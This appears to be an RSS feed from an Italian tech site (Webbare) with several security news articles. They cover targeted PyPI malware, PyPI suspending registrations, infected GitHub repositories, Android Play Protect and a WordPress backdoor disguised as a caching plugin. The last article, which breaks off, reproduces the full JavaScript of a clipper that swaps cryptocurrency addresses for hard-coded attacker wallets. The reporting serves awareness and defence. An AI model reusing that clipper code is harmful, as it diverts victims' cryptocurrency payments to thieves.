<p>Il codice verificava la presenza di un UUID specifico, indicando un attacco altamente mirato. Se l&#8217;UUID non corrispondeva, l&#8217;installazione proseguiva senza distribuire il malware. Ciò suggerisce che gli aggressori stavano testando la distribuzione o avevano in mente un obiettivo molto specifico.</p>
<p>Quando le condizioni erano soddisfatte, il file PNG sovradimensionato veniva elaborato per estrarre il binario nascosto, che veniva poi reso eseguibile ed eseguito in background, dando di fatto agli aggressori il controllo del computer. L&#8217;analisi dei file ha identificato il binario come un componente di OSX/Silver, un framework C2 (comando e controllo) simile a Cobalt Strike, ma meno conosciuto e quindi con minori probabilità di essere rilevato.</p>
<p>Phylum ha notato che le versioni precedenti di questo pacchetto includevano il gancio di installazione dannoso e il binario impacchettato. Tuttavia, le versioni successive &#8211; identificate come 2.28.0 e 2.28.1 &#8211; hanno ridotto queste caratteristiche aggressive; la prima non esegue più il binario al momento dell&#8217;installazione e la seconda è del tutto priva dei componenti dannosi.</p>
<p>La scoperta ha provocato una segnalazione immediata a PyPI, che ha portato alla rimozione di tutte le versioni del pacchetto dal repository. Questa sequenza di eventi sottolinea la necessità di vigilare nella comunità open-source, dove la confusione delle dipendenze e gli attacchi mirati stanno diventando sempre più sofisticati.</p>
<p>Questo incidente ci ricorda che gli aggressori continuano ad evolvere i loro metodi per sfruttare gli ecosistemi open-source, sfruttando pacchetti apparentemente innocenti per distribuire malware. È necessario aumentare la consapevolezza e le misure preventive in tutta la comunità tecnologica per salvaguardarsi da questi attacchi.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c7ac05738{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c7ac05738{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c7ac05738{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c7ac05738{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-05-phylum-malware-python/">Phylum scopre un malware mirato camuffato in un pacchetto Python</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PyPI sospende le registrazioni a causa di un attacco di malware</title>
		<link>https://www.webbare.it/2024-04-pypi-malware-registrazioni-sospese/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pypi-malware-registrazioni-sospese</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 03 Apr 2024 08:18:31 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[python package index]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[typosquatting]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2391</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-04-pypi-malware-registrazioni-sospese/">PyPI sospende le registrazioni a causa di un attacco di malware</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0c853a" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0c85306385"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0c87b09045" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0c87b2 "><div class="wpb_wrapper thegem-custom-6a9b57c0c87b09045">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0c8a0e9126"  >
			<div class="wpb_wrapper">
				<p>Il <a href="https://pypi.org/">Python Package Index</a> (PyPI) ha sospeso la creazione di nuovi progetti e la registrazione degli utenti per mitigare una campagna di upload di malware in corso. Questa mossa arriva dopo che i ricercatori di sicurezza di Checkmarx <a href="https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended">hanno scoperto</a> una campagna che coinvolge più pacchetti dannosi legati agli stessi attori della minaccia.</p>
<p>Gli aggressori stanno prendendo di mira le vittime attraverso attacchi di typosquatting, inducendo gli utenti a installare pacchetti Python dannosi attraverso la loro interfaccia a riga di comando. Questo attacco in più fasi mira a rubare portafogli di criptovalute, dati sensibili del browser come cookie e dati delle estensioni e varie credenziali.</p>
<p>Il payload dannoso impiega anche un meccanismo di persistenza per sopravvivere ai riavvii del sistema, garantendo l&#8217;accesso continuo alle macchine compromesse.</p>
<h4>Pacchetti maligni di typosquatting</h4>
<p>Tra il 27 e il 28 marzo 2024, diversi pacchetti Python dannosi sono stati caricati su PyPI, probabilmente utilizzando strumenti di automazione. Questi pacchetti contenevano codice maligno all&#8217;interno dei loro file setup.py, consentendo l&#8217;esecuzione automatica al momento dell&#8217;installazione.</p>
<p>I file setup.py contenevano codice offuscato e crittografato utilizzando il modulo di crittografia Fernet. Al momento dell&#8217;installazione, questo codice veniva eseguito, innescando il recupero di un payload aggiuntivo da un server remoto. L&#8217;URL del payload è stato costruito dinamicamente aggiungendo il nome del pacchetto come parametro di query.</p>
<p>Una volta decriptato, il payload recuperato ha rivelato un ampio info-stealer progettato per raccogliere informazioni sensibili dal computer della vittima, tra cui portafogli di criptovalute, dati del browser e credenziali.</p>
<p>In risposta alla campagna di malware, PyPI ha temporaneamente sospeso la creazione di nuovi progetti e la registrazione di nuovi utenti. Questa misura mira a mitigare la minaccia in corso mentre l&#8217;organizzazione indaga e affronta il problema.</p>
<p>L&#8217;<em>elenco completo dei pacchetti scoperti da Checkmarx è </em> disponibile <a href="https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/"><em>qui</em></a><em>.</em></p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c8a0e9126{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c8a0e9126{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c8a0e9126{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c8a0e9126{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-04-pypi-malware-registrazioni-sospese/">PyPI sospende le registrazioni a causa di un attacco di malware</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>GitHub, oltre 100.000 repository infetti</title>
		<link>https://www.webbare.it/2024-03-github-repository-infetti/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=github-repository-infetti</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 06 Mar 2024 13:11:34 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[apiiro]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[dependency confusion]]></category>
		<category><![CDATA[GitHub]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[repo]]></category>
		<category><![CDATA[repositories]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2356</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-03-github-repository-infetti/">GitHub, oltre 100.000 repository infetti</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0c93f6" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0c93ed2395"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0c96bb2436" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0c96be "><div class="wpb_wrapper thegem-custom-6a9b57c0c96bb2436">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0c9a714941"  >
			<div class="wpb_wrapper">
				<p>Gli sviluppatori si trovano di fronte a una grave minaccia per la sicurezza: oltre 100.000 repository su GitHub sono stati infettati con codice malevolo.</p>
<p>La recrudescenza di una campagna di confusione di repo maligni &#8211; <a href="https://apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack">rilevata</a> dai ricercatori di sicurezza di Apiiro &#8211; ha colpito innumerevoli sviluppatori che utilizzano inconsapevolmente repository che ritengono affidabili ma che in realtà sono compromessi.</p>
<p>Simili agli attacchi di confusione delle dipendenze &#8211; che sfruttano i gestori di pacchetti &#8211; gli attacchi di confusione dei repository si basano sull&#8217;errore umano, inducendo gli sviluppatori a scaricare versioni dannose invece di quelle legittime.</p>
<p>I malintenzionati clonano i repository esistenti, li infettano con il malware, li caricano con nomi identici su GitHub e poi li biforcano automaticamente migliaia di volte, diffondendoli sul web attraverso forum e altri canali.</p>
<p>Una volta che gli sviluppatori utilizzano questi repository infetti, il payload nascosto scompone gli strati di offuscamento, eseguendo codice Python ed eseguibili binari dannosi. Questo codice modificato &#8211; spesso una versione di BlackCap-Grabber &#8211; raccoglie dati sensibili come le credenziali di accesso e le informazioni del browser, inviandoli al server di comando e controllo degli aggressori.</p>
<p>Mentre GitHub rimuove rapidamente la maggior parte dei repository biforcati, il rilevamento automatico non ne individua molti, permettendo a migliaia di persone di persistere.</p>
<p><img class="aligncenter wp-image-2358 size-full" src="https://www.webbare.it/wp-content/uploads/2024/03/Schermata-2024-03-06-alle-14.09.32.png" alt="" width="1012" height="541" srcset="https://www.webbare.it/wp-content/uploads/2024/03/Schermata-2024-03-06-alle-14.09.32.png 1012w, https://www.webbare.it/wp-content/uploads/2024/03/Schermata-2024-03-06-alle-14.09.32-300x160.png 300w, https://www.webbare.it/wp-content/uploads/2024/03/Schermata-2024-03-06-alle-14.09.32-768x411.png 768w" sizes="(max-width: 1012px) 100vw, 1012px" /></p>
<p>Il processo di rimozione, che ha come obiettivo le bombe a forcella, avviene entro poche ore dal caricamento, rendendo difficile documentare la portata dell&#8217;attacco. L&#8217;enorme volume di repository coinvolti in questa campagna, unito alla loro automazione, rappresenta una sfida significativa per gli sforzi di rilevamento e mitigazione.</p>
<p>Questa campagna dannosa è iniziata nel maggio 2023 con la diffusione di pacchetti dannosi su PyPI e mette in evidenza una tendenza più ampia del malware che prende di mira le catene di fornitura del software. Con l&#8217;aumento dell&#8217;attenzione sui gestori di pacchetti, gli aggressori stanno spostando la loro attenzione sui gestori del controllo sorgente come <strong>GitHub</strong>.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c9a714941{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c9a714941{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c9a714941{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c9a714941{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-03-github-repository-infetti/">GitHub, oltre 100.000 repository infetti</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Android verifica finalmente la presenza di malware nelle app prima dell&#8217;installazione</title>
		<link>https://www.webbare.it/2023-10-android-malware-verifica/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=android-malware-verifica</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 25 Oct 2023 12:37:53 +0000</pubDate>
				<category><![CDATA[Mobile App]]></category>
		<category><![CDATA[Mobile Dev]]></category>
		<category><![CDATA[Web Developer]]></category>
		<category><![CDATA[Android]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[play protect]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[sideloading]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2279</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2023-10-android-malware-verifica/">Android verifica finalmente la presenza di malware nelle app prima dell&#8217;installazione</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0ca573" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0ca56a8978"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0ca8156676" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0ca817 "><div class="wpb_wrapper thegem-custom-6a9b57c0ca8156676">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0caaa62286"  >
			<div class="wpb_wrapper">
				<p>In risposta alle crescenti minacce informatiche, Google ha introdotto un aggiornamento per rafforzare la sicurezza di <strong>Android</strong>. Questo miglioramento si concentra sul rafforzamento del rilevamento di malware prima dell&#8217;installazione delle <strong>app</strong>, garantendo un ecosistema Android più sicuro.</p>
<p>Con questo aggiornamento, <strong>Google Play Protect</strong> esegue ora scansioni in tempo reale a livello di codice durante il processo di installazione delle app:</p>
<p><img class="aligncenter wp-image-2280 size-full" src="https://www.webbare.it/wp-content/uploads/2023/10/image-1024x670-1.png" alt="" width="1024" height="670" srcset="https://www.webbare.it/wp-content/uploads/2023/10/image-1024x670-1.png 1024w, https://www.webbare.it/wp-content/uploads/2023/10/image-1024x670-1-300x196.png 300w, https://www.webbare.it/wp-content/uploads/2023/10/image-1024x670-1-768x503.png 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0caaa62286{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0caaa62286{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0caaa62286{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0caaa62286{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cacf03388"  >
			<div class="wpb_wrapper">
				<p>Fornendo agli utenti un <strong>feedback</strong> immediato sulla sicurezza delle app che stanno installando, Google consente agli utenti di prendere decisioni informate, riducendo così i rischi associati alle app dannose.</p>
<p>Il miglioramento è stato avviato a livello globale, a partire da alcuni Paesi selezionati, per poi estendersi gradualmente a tutte le regioni. L&#8217;impegno di <strong>Google</strong> nel fornire un&#8217;esperienza digitale sicura ai propri utenti è evidente nella distribuzione tempestiva di questa funzione in tutto il mondo.</p>
<p>Questo aggiornamento essenziale sottolinea i continui sforzi di Google per mantenere l&#8217;integrità della sua piattaforma. Concentrandosi sui controlli in tempo reale delle minacce informatiche durante le installazioni, Google intende promuovere la fiducia degli utenti nell&#8217;ecosistema <strong>Android</strong> e favorire un&#8217;esperienza mobile più sicura e protetta per milioni di utenti.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cacf03388{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cacf03388{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cacf03388{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cacf03388{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2023-10-android-malware-verifica/">Android verifica finalmente la presenza di malware nelle app prima dell&#8217;installazione</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Una nuova backdoor di WordPress crea un amministratore malevolo per dirottare i siti web</title>
		<link>https://www.webbare.it/2023-10-backdoor-wordpress-amministratore/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=backdoor-wordpress-amministratore</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 18 Oct 2023 12:17:33 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[Web Developer]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Plugin]]></category>
		<category><![CDATA[Website]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2271</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2023-10-backdoor-wordpress-amministratore/">Una nuova backdoor di WordPress crea un amministratore malevolo per dirottare i siti web</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0cb85d" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0cb8546194"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0cbae87458" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0cbaeb "><div class="wpb_wrapper thegem-custom-6a9b57c0cbae87458">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cbd326381"  >
			<div class="wpb_wrapper">
				<p>Un nuovo <strong>malware</strong> si è spacciato per un plugin di caching legittimo per colpire i siti WordPress, consentendo agli attori delle minacce di creare un account amministratore e controllare l&#8217;attività del sito.</p>
<p>Il malware è una backdoor con una serie di funzioni che gli consentono di gestire i plugin e di nascondersi da quelli attivi sui siti web compromessi, di sostituire i contenuti o di reindirizzare alcuni utenti verso posizioni dannose.</p>
<p>Gli analisti di <em>Defiant</em>, i produttori del plugin di sicurezza Wordfence per WordPress, hanno scoperto il nuovo malware a luglio durante la pulizia di un sito web.</p>
<p>Osservando più da vicino la <strong>backdoor</strong>, i ricercatori hanno notato che si presentava &#8220;con un commento di apertura dall&#8217;aspetto professionale&#8221; per camuffarsi da strumento di caching, che di solito aiuta a ridurre la pressione sui server e a migliorare i tempi di caricamento delle pagine.</p>
<p>La decisione di imitare tale strumento sembra deliberata, per garantire che passi inosservato durante le ispezioni manuali. Inoltre, il plugin dannoso è impostato per escludersi dall&#8217;elenco dei &#8220;plugin attivi&#8221; come mezzo per eludere i controlli.</p>
<p>Il malware presenta le seguenti funzionalità:</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cbd326381{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cbd326381{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cbd326381{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cbd326381{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cbf675921"  >
			<div class="wpb_wrapper">
				<ul>
<li>Creazione di un utente &#8211; Una funzione crea un utente chiamato &#8220;superadmin&#8221; con una password codificata e permessi di amministrazione, mentre una seconda funzione può rimuovere l&#8217;utente per cancellare le tracce dell&#8217;infezione.</li>
<li>Creazione di un utente amministratore disonesto nel sito</li>
<li>Rilevamento dei bot &#8211; Quando i visitatori venivano identificati come bot (ad esempio i crawler dei motori di ricerca), il malware serviva loro contenuti diversi, come lo spam, inducendoli a indicizzare il sito compromesso alla ricerca di contenuti dannosi. In questo modo, gli amministratori potrebbero assistere a un improvviso aumento del traffico o a segnalazioni di utenti che si lamentano di essere stati reindirizzati verso posizioni dannose.</li>
<li>Sostituzione dei contenuti &#8211; Il malware può alterare i contenuti dei post e delle pagine e inserire link o pulsanti di spam. Gli amministratori dei siti web ricevono contenuti non modificati per ritardare la realizzazione della compromissione.</li>
<li>Controllo dei plugin &#8211; Gli operatori del malware possono attivare o disattivare da remoto plugin WordPress arbitrari sul sito compromesso. Inoltre, pulisce le sue tracce dal database del sito, in modo che questa attività rimanga nascosta.</li>
<li>Controllo dell&#8217;attivazione/disattivazione dei plugin</li>
<li>Invocazione remota &#8211; La backdoor controlla stringhe specifiche dell&#8217;agente utente, consentendo agli aggressori di attivare in remoto varie funzioni dannose.</li>
</ul>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cbf675921{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cbf675921{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cbf675921{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cbf675921{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cc18c2724"  >
			<div class="wpb_wrapper">
				<p><strong><em>&#8220;Prese insieme, queste caratteristiche forniscono agli aggressori tutto ciò di cui hanno bisogno per controllare e monetizzare da remoto un sito vittima, a spese delle classifiche SEO del sito stesso e della privacy degli utenti&#8221;</em></strong>, affermano i ricercatori in un rapporto.</p>
<p>Al momento, Defiant non fornisce alcun dettaglio sul numero di siti web compromessi con il nuovo malware e i suoi ricercatori devono ancora determinare il vettore di accesso iniziale.<br />
I metodi tipici per compromettere un sito web includono il furto di credenziali, il brute-forcing delle password o lo sfruttamento di una vulnerabilità in un plugin o in un tema esistente.</p>
<p>Defiant ha rilasciato una firma di rilevamento per gli utenti della versione gratuita di Wordfence e ha aggiunto una regola del firewall per proteggere gli utenti Premium, Care e Response dalla backdoor.</p>
<p>Pertanto, i proprietari di siti web dovrebbero utilizzare credenziali forti e uniche per gli account di amministrazione, mantenere i plugin aggiornati e rimuovere i componenti aggiuntivi e gli utenti inutilizzati.ss crea un amministratore malvagio per dirottare i siti web</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cc18c2724{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cc18c2724{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cc18c2724{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cc18c2724{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2023-10-backdoor-wordpress-amministratore/">Una nuova backdoor di WordPress crea un amministratore malevolo per dirottare i siti web</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Malware Clipper trovato in oltre 451 pacchetti PyPI</title>
		<link>https://www.webbare.it/2023-02-pypi-malware-clipper/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pypi-malware-clipper</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 21 Feb 2023 09:11:32 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Clipper]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2123</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2023-02-pypi-malware-clipper/">Malware Clipper trovato in oltre 451 pacchetti PyPI</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0ccbc2" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0ccbb9624"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0cce453813" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0cce47 "><div class="wpb_wrapper thegem-custom-6a9b57c0cce453813">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cd0b29957"  >
			<div class="wpb_wrapper">
				<p>I ricercatori di sicurezza di <strong>Phylum</strong> hanno scoperto oltre 451 pacchetti nel <strong>Python Package Index (PyPI)</strong> che sono infetti da malware &#8220;clipper&#8221;.</p>
<p>I clipper sostituiscono il contenuto degli appunti di una vittima con qualcosa che avvantaggia l&#8217;aggressore. I clipper più diffusi oggi cercano indirizzi di criptovaluta e li modificano per <strong>rubare fondi.</strong></p>
<p>A partire dal 9 febbraio, Phylum è stata avvisata dalla sua piattaforma di rilevamento automatico dei rischi di una lunga serie di pubblicazioni sospette su PyPI. I ricercatori hanno notato che sembrava simile a una precedente campagna scoperta nel novembre 2022, ma con una tecnica di offuscamento aggiornata e un volume &#8220;radicalmente aumentato&#8221;.</p>
<p>La campagna precedente ha visto gli aggressori pubblicare poco più di due dozzine di pacchetti. Questa volta ci sono oltre 451 pacchetti unici.</p>
<p><em>&#8220;Questo utente malintenzionato ha notevolmente aumentato la propria impronta in pypi attraverso l&#8217;automazione&#8221;,</em> ha spiegato Phylum.</p>
<p>Entrambe le campagne sfruttano il typosquatting, ovvero un semplice errore di battitura nell&#8217;indirizzo di un pacchetto legittimo, per indurre gli sviluppatori a installare versioni dannose.</p>
<p>In questo caso, viene creata un&#8217;estensione del browser Chromium che viene caricata automaticamente all&#8217;avvio di uno dei browser di destinazione, inclusi Chrome, Edge, Brave e Opera, utilizzando l&#8217;opzione della riga di comando &#8220;–load-extension&#8221;.</p>
<p>Il seguente JavaScript viene quindi scritto nell&#8217;estensione che mira a sostituire la crittografia indirizzata con quella controllata dall&#8217;attacker:</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cd0b29957{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cd0b29957{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cd0b29957{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cd0b29957{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cd3167089"  >
			<div class="wpb_wrapper">
				<p>let page = chrome.extension.getBackgroundPage();</p>
<p>var inputElement = document.createElement(‘input’);</p>
<p>document.body.appendChild(inputElement);</p>
<p>inputElement.focus();</p>
<p>function checkWalletAddresses() {</p>
<p>document.execCommand(‘paste’);</p>
<p>var clipboardContent = inputElement.value;</p>
<p>clipboardContent = clipboardContent.replace(/^(0x)[A-Fa-f0-9]{40}$/g, ‘0x6eb2103839011Ed56c98145b3d3f9d6BE1b4dA63’);</p>
<p>clipboardContent = clipboardContent.replace(/^T[A-Za-z1-9]{33}$/g, ‘TK3dtT7vYLkhUyzLqbQMmsrM36QzFnmfaa’);</p>
<p>clipboardContent = clipboardContent.replace(/^(bnb1)[0-9a-z]{38}$/g, ‘bnb1pncs5ct0rdh3rcdms8708x9jrdy038ml33ceuw’);</p>
<p>clipboardContent = clipboardContent.replace(/^([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})$/g, ‘bc1qkjm7r677a4fkxcmx9kzlk55a9eaqtztq8zwrc2’);</p>
<p>clipboardContent = clipboardContent.replace(/^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$/g, ‘LcVct9KwHwUKftDNjbBxUtjK9WeUkYbRN3’);</p>
<p>clipboardContent = clipboardContent.replace(/^r[0-9a-zA-Z]{24,34}$/g, ‘rJd2pxs7TxE77W8X3Ezt2QyrhMJixMehPx’);</p>
<p>clipboardContent = clipboardContent.replace(/^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$/g, ‘DFbEVJUt9TcyBgVGriy3DcNBwYhK3s7Yhx’);</p>
<p>clipboardContent = clipboardContent.replace(/^addr1[a-z0-9]+$/g, ‘addr1q8206rrze22rz8g5lggn4clv7zu9mq6w6a6llvw8v3l7r8k5l5xx9j55xyw3f7s38t37eu9ctkp5a4m4l7cuwerlux0qxlhwvz’);</p>
<p>clipboardContent = clipboardContent.replace(/^[48]([0-9AB]{1})([0-9a-zA-Z]{93})$/g, ’41iwYzbS1KKX8DFySxDcGBGGfJzywUeHxWumm4fjYxtYCiHtysXmq3P7RqG18Tv5UDKGNQegefxS2FFqrqeapvB7FuYSBJv’);</p>
<p>clipboardContent = clipboardContent.replace(/^G[0-7A-Za-z]{55}$/g, ‘GCUPRZDN5RGSO3MC4LBIZBJMCS5KNUYQI2HZNUHVEBC5LNWZODWQ24XH’);</p>
<p>\tclipboardContent = clipboardContent.replace(/^cosmos[a-z0-9]{39}$/g, ‘cosmos1cd3hxdkc775zj75xtd3gqp8s7hynxkzewcf58y’);</p>
<p>inputElement.value = clipboardContent;</p>
<p>inputElement.select();</p>
<p>document.execCommand(‘copy’);</p>
<p>inputElement.value = ”;</p>
<p>}</p>
<p>setInterval(checkWalletAddresses, 1000);</p>

			</div>
